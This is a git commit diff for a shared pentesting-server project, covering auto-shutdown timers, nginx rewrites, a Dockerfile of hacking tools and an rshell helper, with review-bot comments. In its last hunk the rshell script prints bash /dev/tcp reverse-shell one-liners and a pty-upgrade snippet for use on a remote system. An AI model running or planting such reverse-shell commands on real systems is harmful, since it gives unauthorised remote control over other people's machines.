guest docker bumping

SkyperTHC 2024-01-20 20:44:05 +00:00
parent fc10201e80
commit 44f0018fff
GPG Key ID: A9BD386DF9113CD6
21 changed files with 324 additions and 264 deletions

@ -1,7 +1,10 @@
0.5.4 - 2023-02-00 0.5.4 - 2023-02-00
* OpenSSH 9.6p1
* rshell * rshell
* sploitscan * sploitscan
* OpenVPN (curl sf/vpn) * OpenVPN (curl sf/ovpn)
* Different auto-shutdown timers for FREE and TOKEN users
* Syscop login message after auto-shutdown
0.5.2 - 2023-12-00 0.5.2 - 2023-12-00
* Kali 2023.4 * Kali 2023.4

@ -119,6 +119,7 @@ FILES_PROVISION += "segfault-$(VER)/provision/update.sh"
FILES_ENCFSD += "segfault-$(VER)/encfsd/Makefile" FILES_ENCFSD += "segfault-$(VER)/encfsd/Makefile"
FILES_ENCFSD += "segfault-$(VER)/encfsd/Dockerfile" FILES_ENCFSD += "segfault-$(VER)/encfsd/Dockerfile"
FILES_ENCFSD += "segfault-$(VER)/encfsd/destructor.sh" FILES_ENCFSD += "segfault-$(VER)/encfsd/destructor.sh"
FILES_ENCFSD += "segfault-$(VER)/encfsd/funcs_destructor.sh"
FILES_ENCFSD += "segfault-$(VER)/encfsd/encfsd.sh" FILES_ENCFSD += "segfault-$(VER)/encfsd/encfsd.sh"
FILES_ENCFSD += "segfault-$(VER)/encfsd/portd.sh" FILES_ENCFSD += "segfault-$(VER)/encfsd/portd.sh"
@ -137,6 +138,7 @@ FILES_GSNC += "segfault-$(VER)/gsnc/sf-gsnc.sh"
FILES_CONFIG += "segfault-$(VER)/config/etc/nginx/nginx.conf" FILES_CONFIG += "segfault-$(VER)/config/etc/nginx/nginx.conf"
FILES_CONFIG += "segfault-$(VER)/config/etc/nginx/nginx-rpc.conf" FILES_CONFIG += "segfault-$(VER)/config/etc/nginx/nginx-rpc.conf"
FILES_CONFIG += "segfault-$(VER)/config/etc/sf/sf.conf" FILES_CONFIG += "segfault-$(VER)/config/etc/sf/sf.conf"
FILES_CONFIG += "segfault-$(VER)/config/etc/sf/timers.conf"
FILES_CONFIG += "segfault-$(VER)/config/etc/redis/redis.conf" FILES_CONFIG += "segfault-$(VER)/config/etc/redis/redis.conf"
FILES_CONFIG += "segfault-$(VER)/config/etc/sf/WARNING---SHARED-BETWEEN-ALL-SERVERS---README.txt" FILES_CONFIG += "segfault-$(VER)/config/etc/sf/WARNING---SHARED-BETWEEN-ALL-SERVERS---README.txt"
FILES_CONFIG += "segfault-$(VER)/config/etc/resolv.conf" FILES_CONFIG += "segfault-$(VER)/config/etc/resolv.conf"
@ -156,7 +158,7 @@ FILES_ROOT += "segfault-$(VER)/sfbin/funcs.sh"
FILES_ROOT += "segfault-$(VER)/sfbin/funcs_redis.sh" FILES_ROOT += "segfault-$(VER)/sfbin/funcs_redis.sh"
FILES_ROOT += "segfault-$(VER)/sfbin/funcs_admin.sh" FILES_ROOT += "segfault-$(VER)/sfbin/funcs_admin.sh"
FILES_ROOT += "segfault-$(VER)/sfbin/funcs_net.sh" FILES_ROOT += "segfault-$(VER)/sfbin/funcs_net.sh"
FILES_ROOT += "segfault-$(VER)/sfbin/funcs_vpn.sh" FILES_ROOT += "segfault-$(VER)/sfbin/funcs_ovpn.sh"
FILES_ROOT += "segfault-$(VER)/sfbin/ovpn_up.sh" FILES_ROOT += "segfault-$(VER)/sfbin/ovpn_up.sh"
FILES_ROOT += "segfault-$(VER)/sfbin/sf" FILES_ROOT += "segfault-$(VER)/sfbin/sf"
FILES_ROOT += "segfault-$(VER)/sfbin/banhammer.sh" FILES_ROOT += "segfault-$(VER)/sfbin/banhammer.sh"

@ -69,13 +69,15 @@ http {
gzip off; gzip off;
location / { location / {
try_files $uri $uri/ = 404; #try_files $uri $uri/ = 404;
rewrite /net /net/; rewrite ^/net$ /net/ last;
rewrite /vpn /vpn/; rewrite ^/ovpn$ /ovpn/ last;
rewrite /wg /wg/; rewrite ^/vpn$ /ovpn/ last;
rewrite /dmesg /dmesg/; rewrite ^/wg$ /wg/ last;
rewrite /port /port/; rewrite ^/dmesg$ /dmesg/ last;
rewrite /set /set/; rewrite ^/port$ /port/ last;
rewrite ^/set$ /set/ last;
rewrite ^/vpn/(.*)$ /ovpn/$1 last;
location ~* ^/set/.* { location ~* ^/set/.* {
fastcgi_param REMOTE_ADDR $remote_addr; fastcgi_param REMOTE_ADDR $remote_addr;
@ -101,11 +103,11 @@ http {
fastcgi_param SCRIPT_FILENAME /cgi-bin/rpc; fastcgi_param SCRIPT_FILENAME /cgi-bin/rpc;
fastcgi_pass unix:/dev/shm/sf/master/fcgiwrap.socket; fastcgi_pass unix:/dev/shm/sf/master/fcgiwrap.socket;
} }
location ~* ^/vpn/.* { location ~* ^/ovpn/.* {
fastcgi_param REMOTE_ADDR $remote_addr; fastcgi_param REMOTE_ADDR $remote_addr;
fastcgi_param REQUEST_URI $request_uri; fastcgi_param REQUEST_URI $request_uri;
fastcgi_param REQUEST_BODY $request_body; fastcgi_param REQUEST_BODY $request_body;
fastcgi_param FCGI_CMD vpn; fastcgi_param FCGI_CMD ovpn;
fastcgi_param SCRIPT_FILENAME /cgi-bin/rpc; fastcgi_param SCRIPT_FILENAME /cgi-bin/rpc;
fastcgi_pass unix:/dev/shm/sf/master/fcgiwrap.socket; fastcgi_pass unix:/dev/shm/sf/master/fcgiwrap.socket;
} }
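Review bot: The `#try_files $uri $uri/ = 404;` at the top of the first hunk is left behind as dead configuration with no reason recorded, and with it disabled `location /` has no explicit 404 fallback any more and relies on nginx's default static-file handling for paths that none of the rewrites match. Either delete the line or replace it with a comment that states why it was turned off, e.g. `# try_files disabled: <reason>`. The anchored forms such as `rewrite ^/net$ /net/ last;` are a clear improvement over the old unanchored `rewrite /net /net/;`, which as a regex also matched any URI merely containing `/net`. The `http {` and `location /` blocks both extend beyond the hunks.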

@ -0,0 +1,6 @@
#SF_TIMEOUT_WITH_SHELL=$((60 * 60 * 36))
#SF_TIMEOUT_NO_SHELL=$((60 * 60 * 1))
#SF_TIMEOUT_TOKEN_WITH_SHELL=$((60 * 60 * 24 * 7))
#SF_TIMEOUT_TOKEN_NO_SHELL=$((60 * 60 * 36))
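Review bot: The file carries no header explaining its contract: the encfsd destructor hunk shows it is `source`d by bash every 30 s, so every uncommented line here is executed as shell code inside that container rather than read as key=value pairs, and the numbers are seconds. A leading comment such as `# Sourced by encfsd/destructor.sh (bash) every 30s. Values are seconds; keep to VAR=$((...)) assignments only.` tells an operator editing it that anything they write runs with the daemon's privileges. The example values match the defaults in destructor.sh, which is worth saying as well so nobody assumes the commented lines are the active configuration.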

@ -40,7 +40,7 @@ services:
devices: devices:
- "/dev/fuse:/dev/fuse" - "/dev/fuse:/dev/fuse"
volumes: volumes:
- "${SF_BASEDIR:-.}/config/db:/config/db:ro" - "${SF_BASEDIR:-.}/config/db:/config/db:rw"
- "${SF_BASEDIR:-.}/config/etc/sf:/config/etc/sf:ro" - "${SF_BASEDIR:-.}/config/etc/sf:/config/etc/sf:ro"
- "${SF_BASEDIR:-.}/data:/encfs/raw" - "${SF_BASEDIR:-.}/data:/encfs/raw"
- "${SF_SHMDIR:-/dev/shm/sf}/encfs-sec:/encfs/sec:shared" - "${SF_SHMDIR:-/dev/shm/sf}/encfs-sec:/encfs/sec:shared"
@ -76,6 +76,7 @@ services:
- "/dev/fuse:/dev/fuse" - "/dev/fuse:/dev/fuse"
volumes: volumes:
- "${SF_BASEDIR:-.}/config/db:/config/db:ro" - "${SF_BASEDIR:-.}/config/db:/config/db:ro"
- "${SF_BASEDIR:-.}/config/etc/sf:/config/etc/sf:ro"
- "${SF_BASEDIR:-.}/data:/encfs/raw" - "${SF_BASEDIR:-.}/data:/encfs/raw"
- "${SF_SHMDIR:-/dev/shm/sf}/self-for-guest:/config/self-for-guest" - "${SF_SHMDIR:-/dev/shm/sf}/self-for-guest:/config/self-for-guest"
- "${SF_SHMDIR:-/dev/shm/sf}/encfs-sec:/encfs/sec:shared" - "${SF_SHMDIR:-/dev/shm/sf}/encfs-sec:/encfs/sec:shared"

@ -9,4 +9,4 @@ RUN apk add --no-cache --upgrade \
encfs \ encfs \
redis \ redis \
xfsprogs-extra xfsprogs-extra
COPY destructor.sh encfsd.sh portd.sh / COPY destructor.sh funcs_destructor.sh encfsd.sh portd.sh /

@ -3,149 +3,28 @@
# shellcheck disable=SC1091 # Do not follow # shellcheck disable=SC1091 # Do not follow
source /sf/bin/funcs.sh source /sf/bin/funcs.sh
source /sf/bin/funcs_redis.sh source /sf/bin/funcs_redis.sh
SF_TIMEOUT_WITH_SHELL=604800 # Defaults
SF_TIMEOUT_NO_SHELL=129600 SF_TIMEOUT_WITH_SHELL=$((60 * 60 * 36))
SF_TIMEOUT_NO_SHELL=$((60 * 60 * 1))
SF_TIMEOUT_TOKEN_WITH_SHELL=$((60 * 60 * 24 * 7))
SF_TIMEOUT_TOKEN_NO_SHELL=$((60 * 60 * 36))
[[ -n $SF_DEBUG ]] && { [[ -n $SF_DEBUG ]] && {
SF_TIMEOUT_WITH_SHELL=180 SF_TIMEOUT_WITH_SHELL=60
SF_TIMEOUT_NO_SHELL=120 SF_TIMEOUT_NO_SHELL=15
} SF_TIMEOUT_TOKEN_WITH_SHELL=120
SF_TIMEOUT_TOKEN_NO_SHELL=90
# [LID] <1=encfs> <1=Container> <message>
# Either parameter can be "" to not stop encfs or lg-container
stop_lg()
{
local is_encfs
local is_container
local lid
local ts_born
lid="$1"
ts_born="$2"
is_encfs="$3"
is_container="$4"
LOG "$lid" "Stopping [$((NOW - ts_born)) sec]. $5"
red RPUSH portd:cmd "remport ${lid}" >/dev/null
rm -f "/sf/run/encfsd/user/lg-${lid}"
rm -f "/sf/run/pids/lg-${lid}.pid"
rm -f "/sf/run/ips/lg-${lid}.ip"
rm -rf "/config/self-for-guest/lg-${lid}"
rm -rf "/sf/run/users/lg-${lid}"
# Kill the OpenVPN process (if running)
docker exec sf-master killall "openvpn-$lid" 2>/dev/null
docker exec sf-master rm -rf "/tmp/lg-$lid" 2>/dev/null
# Tear down container
[[ -n $is_container ]] && docker stop "lg-$lid" &>/dev/nuill
# Odd: On cgroup2 the command 'docker top lg-*' shows that encfs is running
# inside the container even that we never moved it into the container's
# Process Namespace. EncFS will also die when the lg- is shut down.
# This is only neede for cgroup1:
[[ -n $is_encfs ]] && {
pkill -SIGTERM -f "^\[encfs-${lid}\]" 2>/dev/null
# Give kernel time to unmount mountpoint
sleep 1
}
# Do not use 'rm -rf' here as this might still be a mounted drive
# when encfsd is not killed fast enough (failing to delete is acceptable).
rm -f "/encfs/sec/lg-${lid}/THIS-DIRECTORY-IS-NOT-ENCRYPTED--DO-NOT-USE.txt"
rmdir "/encfs/sec/lg-${lid}"
}
# [lg-$LID]
# Check if lg- is running and
# 1. EncFS died
# 2. Container should be stopped (stale, idle)
check_container()
{
local c
local lid
local i
local IFS
local fn
local comm
local ts_logout
local ts_born
IFS=$'\n'
c="$1"
lid="${c#lg-}"
[[ ${#lid} -ne 10 ]] && return
ts_born=$(stat -c %Y "/sf/run/encfsd/user/lg-${lid}") || { ERR "[${CDM}${lid}${CN}] run/encfsd/user/lg-* missing?"; return; }
# Skip if EncFS only started recently (zsh not yet started).
[[ $((NOW - ts_born)) -lt 20 ]] && return 0
# Check if EncFS is still running.
pgrep -f "^\[encfs-${lid}\]" &>/dev/null || {
# NOTE: On CGROUPv2 the encfs dies when the lg container stops (user called 'halt' or 'docker stop')
stop_lg "$lid" "${ts_born}" "" "lg" "EncFS died..."
return
}
# ts_logout may not exist (stale)
ts_logout=0
fn="/config/db/user/lg-${lid}/ts_logout"
[[ -f "$fn" ]] && ts_logout=$(stat -c %Y "$fn")
# Check if there is still a shell running inside the container:
IFS=""
set -o pipefail
comm=$(docker top "lg-${lid}" -eo pid,comm 2>/dev/null | tail +2 | awk '{print $2;}') || {
# HERE: lg died or top failed.
set +o pipefail
stop_lg "${lid}" "${ts_born}" "encfs" "lg" "LG no longer running."
return
}
set +o pipefail
# Note: We must set 'set +o pipefail' (e.g. fail only if last command errors). Otherwise the rare
# condition can happen where grep exits (first match found) but 'echo' is still writing. Then echo
# will receive a SIGPIPE and exit with 141 and the entire pipe will fail.
# [[ -f "/config/db/user/lg-${lid}/is_logged_in" ]] && return
# FIXME: many stale is_logged_in exists without ssh connected ;/
# HERE: LG & EncFS are running.
echo "$comm" | grep -m1 -E '(^zsh$|^bash$|^sh$|^sftp-server$)' >/dev/null && {
# HERE: User still has shell running
[[ -f "/config/db/user/lg-${lid}/is_logged_in" ]] && return
[[ $((NOW - ts_logout)) -lt ${SF_TIMEOUT_WITH_SHELL} ]] && return
# HERE: Not logged in. logged out more than 1 week ago.
stop_lg "${lid}" "${ts_born}" "encfs" "lg" "Not logged in for $((NOW - ts_logout))sec (shell running)."
return
}
# HERE: No shell running, ts_logout=0 if never logged out
# Skip if only recently logged out.
[[ $((NOW - ts_logout)) -lt 60 ]] && return # Recently logged out.
# Filter out stale processes
echo "$comm" | grep -m1 -v -E '(^docker-init$|^sleep$|^encfs$|^gpg-agent$)' >/dev/null || {
# HERE: Nothing running but stale processes
stop_lg "${lid}" "${ts_born}" "encfs" "lg" "No processes running."
return
}
# HERE: Something running (but no shell, and no known processes)
[[ $((NOW - ts_logout)) -ge ${SF_TIMEOUT_NO_SHELL} ]] && {
# User logged out 1.5 days ago. No shell. No known processes.
stop_lg "${lid}" "${ts_born}" "encfs" "lg" "Not logged in for ${SF_TIMEOUT_NO_SHELL}sec (no shell running)."
return
}
# HERE: No shell. No known processes. Less than 1.5 days ago.
} }
[[ ! -S /var/run/docker.sock ]] && ERREXIT 255 "Not found: /var/run/docker.sock" [[ ! -S /var/run/docker.sock ]] && ERREXIT 255 "Not found: /var/run/docker.sock"
source /funcs_destructor.sh || ERREXIT 255
export REDISCLI_AUTH="${SF_REDIS_AUTH}" export REDISCLI_AUTH="${SF_REDIS_AUTH}"
while :; do while :; do
sleep 30 sleep 30
source /config/etc/sf/timers.conf 2>/dev/null
source /funcs_destructor.sh 2>/dev/null
NOW=$(date +%s) NOW=$(date +%s)
# Every 30 seconds check all container we are tracking (from encfsd) # Every 30 seconds check all container we are tracking (from encfsd)
containers=($(cd /sf/run/encfsd/user && echo lg-*)) containers=($(cd /sf/run/encfsd/user && echo lg-*))
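Review bot: `source /config/etc/sf/timers.conf 2>/dev/null` inside the loop runs every 30 s, but the four defaults and the SF_DEBUG overrides above it are assigned only once at startup, so a timer an operator sets in timers.conf and later comments out keeps its old value until the daemon restarts, and a value set there silently wins over the SF_DEBUG block. Either re-assign the defaults in the loop immediately before that `source`, or put the restart requirement on the line itself: `# Re-read every loop; removing a value here does NOT restore the default until restart.` The `2>/dev/null` on both `source` lines also swallows syntax errors from a hand-edited timers.conf, so at least logging the failure with `ERR` would stop a broken file from going unnoticed. The `while :` loop continues beyond the hunk.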

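--- /dev/null
+++ b/encfsd/funcs_destructor.sh
@@ -0,0 +1,153 @@
+# [LID] <1=encfs> <1=Container> <message>
+# Either parameter can be "" to not stop encfs or lg-container
+stop_lg()
+{
+local is_encfs
+local is_container
+local lid
+local ts_born
+lid="$1"
+ts_born="$2"
+is_encfs="$3"
+is_container="$4"
+LOG "$lid" "Stopping [$((NOW - ts_born)) sec]. $5"
+red RPUSH portd:cmd "remport ${lid}" >/dev/null
+rm -f "/sf/run/encfsd/user/lg-${lid}"
+rm -f "/sf/run/pids/lg-${lid}.pid"
+rm -f "/sf/run/ips/lg-${lid}.ip"
+rm -rf "/config/self-for-guest/lg-${lid}"
+rm -rf "/sf/run/users/lg-${lid}"
+# Kill the OpenVPN process (if running)
+docker exec sf-master killall "openvpn-$lid" 2>/dev/null
+docker exec sf-master rm -rf "/tmp/lg-$lid" 2>/dev/null
+# Tear down container
+[[ -n $is_container ]] && docker stop "lg-$lid" &>/dev/nuill
+# Odd: On cgroup2 the command 'docker top lg-*' shows that encfs is running
+# inside the container even that we never moved it into the container's
+# Process Namespace. EncFS will also die when the lg- is shut down.
+# This is only neede for cgroup1:
+[[ -n $is_encfs ]] && {
+pkill -SIGTERM -f "^\[encfs-${lid}\]" 2>/dev/null
+# Give kernel time to unmount mountpoint
+sleep 1
+}
+# Do not use 'rm -rf' here as this might still be a mounted drive
+# when encfsd is not killed fast enough (failing to delete is acceptable).
+rm -f "/encfs/sec/lg-${lid}/THIS-DIRECTORY-IS-NOT-ENCRYPTED--DO-NOT-USE.txt"
+rmdir "/encfs/sec/lg-${lid}"
+}
+try_syscop_msg() {
+local lid="$1"
+echo -en "\
+🤷‍♂️ ${CDM}Your server shut down automatically because you did not log in for $(( (NOW - ts_logout) / 60 / 60 )) h.
+🫵 Please type ${CDC}halt${CDM} to stop your server or...
+❤️ ...get a ${CM}TOKEN${CDM} to stop this message: ${CUL}${CB}https://thc.org/sf/token${CN}${CDM}
+🌈 ${CW}Yours sincerely, The SysCops 😘 ${CN}
+">"/config/db/user/lg-${lid:?}/syscop-msg.txt"
+}
+# [lg-$LID]
+# Check if lg- is running and
+# 1. EncFS died
+# 2. Container should be stopped (stale, idle)
+check_container()
+{
+local c
+local lid
+local IFS=$'\n'
+local fn
+local comm
+local ts_logout
+local ts_born
+local to_with_shell=$SF_TIMEOUT_WITH_SHELL
+local to_no_shell=$SF_TIMEOUT_NO_SHELL
+local is_token
+c="$1"
+lid="${c#lg-}"
+[[ ${#lid} -ne 10 ]] && return
+ts_born=$(stat -c %Y "/sf/run/encfsd/user/lg-${lid}") || { ERR "[${CDM}${lid}${CN}] run/encfsd/user/lg-* missing?"; return; }
+# Skip if EncFS only started recently (zsh not yet started).
+[[ $((NOW - ts_born)) -lt 20 ]] && return 0
+# Check if EncFS is still running.
+pgrep -f "^\[encfs-${lid}\]" &>/dev/null || {
+# NOTE: On CGROUPv2 the encfs dies when the lg container stops (user called 'halt' or 'docker stop')
+stop_lg "$lid" "${ts_born}" "" "lg" "EncFS died..."
+return
+}
+# ts_logout may not exist (stale)
+ts_logout=0
+fn="/config/db/user/lg-${lid}/ts_logout"
+[[ -f "$fn" ]] && ts_logout=$(stat -c %Y "$fn")
+# Check if there is still a shell running inside the container:
+IFS=""
+set -o pipefail
+comm=$(docker top "lg-${lid}" -eo pid,comm 2>/dev/null | tail +2 | awk '{print $2;}') || {
+# HERE: lg died or top failed.
+set +o pipefail
+stop_lg "${lid}" "${ts_born}" "encfs" "lg" "LG no longer running."
+return
+}
+# Load timers
+[[ -e "/config/db/user/lg-${lid}/token" ]] && {
+to_with_shell=$SF_TIMEOUT_TOKEN_WITH_SHELL
+to_no_shell=$SF_TIMEOUT_TOKEN_NO_SHELL
+is_token=1
+}
+set +o pipefail
+# Note: We must set 'set +o pipefail' (e.g. fail only if last command errors). Otherwise the rare
+# condition can happen where grep exits (first match found) but 'echo' is still writing. Then echo
+# will receive a SIGPIPE and exit with 141 and the entire pipe will fail.
+# [[ -f "/config/db/user/lg-${lid}/is_logged_in" ]] && return
+# FIXME: many stale is_logged_in exists without ssh connected ;/
+# HERE: LG & EncFS are running.
+echo "$comm" | grep -m1 -E '(^zsh$|^bash$|^sh$|^sftp-server$)' >/dev/null && {
+# HERE: User still has shell running
+[[ -f "/config/db/user/lg-${lid}/is_logged_in" ]] && return
+[[ $((NOW - ts_logout)) -lt ${to_with_shell} ]] && return
+# HERE: Not logged in. logged out more than 1 week ago.
+stop_lg "${lid}" "${ts_born}" "encfs" "lg" "Not logged in for $((NOW - ts_logout))sec (shell running)."
+[[ -z $is_token ]] && try_syscop_msg "$lid"
+return
+}
+# HERE: No shell running, ts_logout=0 if never logged out
+# Skip if only recently logged out.
+[[ $((NOW - ts_logout)) -lt 60 ]] && return # Recently logged out.
+# Filter out stale processes
+echo "$comm" | grep -m1 -v -E '(^docker-init$|^sleep$|^encfs$|^gpg-agent$)' >/dev/null || {
+# HERE: Nothing running but stale processes
+stop_lg "${lid}" "${ts_born}" "encfs" "lg" "No processes running."
+return
+}
+# HERE: Something running (but no shell, and no known processes)
+[[ $((NOW - ts_logout)) -ge ${to_no_shell} ]] && {
+# User logged out 1.5 days ago. No shell. No known processes.
+stop_lg "${lid}" "${ts_born}" "encfs" "lg" "Not logged in for ${to_no_shell}sec (no shell running)."
+[[ -z $is_token ]] && try_syscop_msg "$lid"
+return
+}
+# HERE: No shell. No known processes. Less than 1.5 days ago.
+}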
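Review bot: `[[ -n $is_container ]] && docker stop "lg-$lid" &>/dev/nuill` in stop_lg redirects to a misspelled path, so every container stop creates and appends to a regular file `/dev/nuill` inside the encfsd container instead of discarding the output; the typo came along from destructor.sh, but this new file is where it should be fixed: `[[ -n $is_container ]] && docker stop "lg-$lid" &>/dev/null`. try_syscop_msg also uses `ts_logout`, which it never receives; it only works because bash's dynamic scoping exposes check_container's `local ts_logout` to the callee, so pass it explicitly with `try_syscop_msg "$lid" "$ts_logout"` and `local ts_logout="$2"`. When the `ts_logout` file is missing, check_container leaves `ts_logout=0` and, with no shell logged in, still reaches the stop_lg/try_syscop_msg path, so the message would quote a "did not log in for N h" value computed from NOW; a guard such as `[[ $ts_logout -gt 0 ]]` before calling try_syscop_msg avoids that, if that path is reachable in practice. Note that try_syscop_msg writes into `/config/db/user/lg-*/`, which is why the compose mount had to become `:rw`.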

@ -614,11 +614,11 @@ RUN /pkg-install.sh HACK ghbin shadow1ng/fscan 'fscan%arch:x86_64=:aarch64=_arm6
&& /pkg-install.sh HACK ghbin 'theaog/spirit' 'spirit%arch:x86_64=:DEFAULT=SKIP%.tgz$' spirit `# x86_64 only, spirit-arm bad` \ && /pkg-install.sh HACK ghbin 'theaog/spirit' 'spirit%arch:x86_64=:DEFAULT=SKIP%.tgz$' spirit `# x86_64 only, spirit-arm bad` \
&& /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/tomnomnom/gf@latest \ && /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/tomnomnom/gf@latest \
&& mkdir -p /usr/share/gf \ && mkdir -p /usr/share/gf \
&& svn export https://github.com/tomnomnom/gf/trunk /tmp/gf \ && git clone --depth 1 https://github.com/tomnomnom/gf.git /tmp/gf \
&& mv /tmp/gf/examples/*.json /usr/share/gf \ && mv /tmp/gf/examples/*.json /usr/share/gf \
&& mv /tmp/gf/gf-completion.* /usr/share/gf \ && mv /tmp/gf/gf-completion.* /usr/share/gf \
&& rm -rf /tmp/gf \ && rm -rf /tmp/gf \
&& svn export https://github.com/1ndianl33t/Gf-Patterns/trunk/ /tmp/gf \ && git clone --depth 1 https://github.com/1ndianl33t/Gf-Patterns.git /tmp/gf \
&& mv /tmp/gf/*.json /usr/share/gf; }' \ && mv /tmp/gf/*.json /usr/share/gf; }' \
&& /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/tomnomnom/hacks/inscope@latest; }' \ && /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/tomnomnom/hacks/inscope@latest; }' \
&& /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/Emoe/kxss@latest; }' \ && /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/Emoe/kxss@latest; }' \
@ -631,7 +631,8 @@ RUN /pkg-install.sh HACK ghbin shadow1ng/fscan 'fscan%arch:x86_64=:aarch64=_arm6
&& cmake . \ && cmake . \
&& make \ && make \
&& cp urldedupe /usr/bin; }' \ && cp urldedupe /usr/bin; }' \
&& /pkg-install.sh HACK bash -c '{ svn export https://github.com/urbanadventurer/username-anarchy/trunk /opt/username-anarchy; }' \ && /pkg-install.sh HACK bash -c '{ git clone --depth 1 https://github.com/urbanadventurer/username-anarchy.git /opt/username-anarchy \
&& rm -rf /opt/username-anarchy/.git*; }' \
&& /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/damit5/gitdorks_go@latest; }' \ && /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/damit5/gitdorks_go@latest; }' \
&& /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/trickest/dsieve@master; }' \ && /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/trickest/dsieve@master; }' \
&& /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/trickest/enumerepo@latest; }' \ && /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/trickest/enumerepo@latest; }' \
@ -802,8 +803,8 @@ RUN /pkg-install.sh HACK ghbin ekzhang/bore '%arch:aarch64=arm%-unknown-linux'
&& /pkg-install.sh HACK bin 'https://github.com/RustScan/RustScan/releases/download/2.0.1/rustscan_2.0.1_amd64.deb' `# x86_64 only` \ && /pkg-install.sh HACK bin 'https://github.com/RustScan/RustScan/releases/download/2.0.1/rustscan_2.0.1_amd64.deb' `# x86_64 only` \
&& /pkg-install.sh HACK bin 'https://github.com/xaitax/SploitScan/raw/main/sploitscan.py' sploitscan \ && /pkg-install.sh HACK bin 'https://github.com/xaitax/SploitScan/raw/main/sploitscan.py' sploitscan \
&& /pkg-install.sh HACK ghbin hueristiq/xurlfind3r 'linux_%arch:x86_64=amd64:aarch64=arm64%' xurlfind3r && /pkg-install.sh HACK ghbin hueristiq/xurlfind3r 'linux_%arch:x86_64=amd64:aarch64=arm64%' xurlfind3r
RUN /pkg-install.sh LARGE ghbin PaddiM8/kalker 'linux' kalker \ RUN /pkg-install.sh LARGE ghbin PaddiM8/kalker 'linux' kalker
&& /pkg-install.sh LARGE ghbin PowerShell/PowerShell 'deb_%arch1%.deb' ## YANKED. Already in apt-get install powershell/pkg-install.sh LARGE ghbin PowerShell/PowerShell 'deb_%arch1%.deb'
RUN /pkg-install.sh HACK bash -c '{ wget -O "/usr/bin/favfreak.py" https://raw.githubusercontent.com/devanshbatham/FavFreak/master/favfreak.py \ RUN /pkg-install.sh HACK bash -c '{ wget -O "/usr/bin/favfreak.py" https://raw.githubusercontent.com/devanshbatham/FavFreak/master/favfreak.py \
&& chmod 755 /usr/bin/favfreak.py \ && chmod 755 /usr/bin/favfreak.py \
&& ln -s favfreak.py /usr/bin/FavFreak; }' \ && ln -s favfreak.py /usr/bin/FavFreak; }' \
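Review bot: The new `git clone --depth 1` calls in the first two hunks check out whatever the default branch head is at build time, exactly as the replaced svn trunk exports did, so the gf patterns and username-anarchy that end up in the image are unpinned and two builds of the same Dockerfile can differ; `git clone --depth 1 --branch <TAG_PLACEHOLDER> ...` pins each to a release without losing the shallow clone. The `rm -rf /tmp/gf` between the two gf clones is load-bearing because git refuses to clone into a non-empty directory, so a one-line comment there would stop someone from dropping it when the lines are reordered. The `RUN` instruction these lines belong to starts and ends outside the hunks.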

@ -293,8 +293,10 @@ alias nocol=noansi
# Make the Project name visibile in the PS1 prompt # Make the Project name visibile in the PS1 prompt
[[ -z $VIRTUAL_ENV ]] && VIRTUAL_ENV="${SF_PRJ}" [[ -z $VIRTUAL_ENV ]] && VIRTUAL_ENV="${SF_PRJ}"
PATH="${HOME:-/sec/root}/go/bin:${HOME:-/sec/root}/.cargo/bin:/sec/root/.local/bin:/sec/usr/sbin:/sec/usr/bin:/sf/bin:$PATH"
PATH="${HOME:-/sec/root}/go/bin:${HOME:-/sec/root}/.cargo/bin:/sec/root/.local/bin:/sec/usr/sbin:/sec/usr/bin:/sf/bin:/usr/local/go/bin:$PATH"
[[ -d /usr/share/doc/python3-impacket/examples ]] && PATH="${PATH}:/usr/share/doc/python3-impacket/examples" [[ -d /usr/share/doc/python3-impacket/examples ]] && PATH="${PATH}:/usr/share/doc/python3-impacket/examples"
export PATH
_sf_info_non_perm() _sf_info_non_perm()
{ {

@ -16,31 +16,31 @@ ERREXIT() {
exit "${code:-99}" exit "${code:-99}"
} }
[[ ! -f /config/self/reverse_port ]] && curl sf/port
load rport /config/self/reverse_port || ERREXIT 255 "No reverse port found. Try ${CC}curl sf/port${CN}." load rport /config/self/reverse_port || ERREXIT 255 "No reverse port found. Try ${CC}curl sf/port${CN}."
load rip /config/self/reverse_ip || ERREXIT 255 "No reverse port found. Try ${CC}curl sf/port${CN}." load rip /config/self/reverse_ip || ERREXIT 255 "No reverse port found. Try ${CC}curl sf/port${CN}."
echo -e "\ echo -e "\
Use any of these commands on the remote system:${CDR} Use one of these commands on the remote system:
bash -c '(exec bash -i &>/dev/tcp/${rip}/${rport} 0>&1) &' 1. ${CDR}bash -c '(exec bash -i &>/dev/tcp/${rip}/${rport} 0>&1) &'${CN}
(bash -i &>/dev/tcp/${rip}/${rport} 0>&1) & 2. ${CDR}(bash -i &>/dev/tcp/${rip}/${rport} 0>&1) &${CN}
${CN} ${CN}Once connected, cut & paste the following into the _this_ shell:
Once connected, cut & paste this into the remote shell:${CDC} ${CF}-------------------------------------------------------------------------------${CDC}
command -v python >/dev/null \\ command -v python >/dev/null \\
&& exec python -c 'import pty; pty.spawn(\"bash\")' \\ && exec python -c 'import pty; pty.spawn(\"bash\")' \\
|| exec script -qc bash /dev/null || exec script -qc bash /dev/null
export SHELL=/bin/bash TERM=xterm-256color
export SHELL=/bin/bash
export TERM=xterm-256color
reset -I reset -I
PS1='"'\[\\033[36m\]\\u\[\\033[m\]@\[\\033[32m\]\\h:\[\\033[33;1m\]\\w\[\\033[m\]\\$ '"' PS1='"'\[\\033[36m\]\\u\[\\033[m\]@\[\\033[32m\]\\h:\[\\033[33;1m\]\\w\[\\033[m\]\\$ '"'
"'stty -echo;printf "\\033[18t";read -rdt R;stty sane $(echo "$R"|awk -F";" '"'"'{ printf "rows "$3" cols "$2; }'"'"')'" "'stty -echo;printf "\\033[18t";read -rdt R;stty sane $(echo "$R"|awk -F";" '"'"'{ printf "rows "$3" cols "$2; }'"'"')'"
